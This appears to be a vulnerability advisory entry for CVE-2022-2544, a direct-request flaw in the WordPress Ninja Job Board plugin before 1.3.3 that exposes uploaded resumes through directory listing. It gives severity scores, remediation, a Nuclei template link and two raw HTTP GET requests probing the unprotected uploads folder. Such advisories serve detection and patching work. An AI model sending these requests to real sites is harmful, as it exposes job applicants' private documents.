| Title | WordPress Ninja Job Board < 1.3.3 - Direct Request |
|---|---|
| Author | tess |
| Severity | High |
| Impact | An attacker can access sensitive files and potentially obtain sensitive information from the target system. |
| Remediation | Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.50013 |
| CVE ID | CVE-2022-2544 |
| CWE ID | CWE-425 |
| Tags | cve2022 cve ninja exposure wpscan wordpress wp-plugin wp wpmanageninja vuln |
WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.
GET /wp/wp-content/uploads/wpjobboard/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/uploads/wpjobboard/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2544.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-2544.pcap
N/AN/A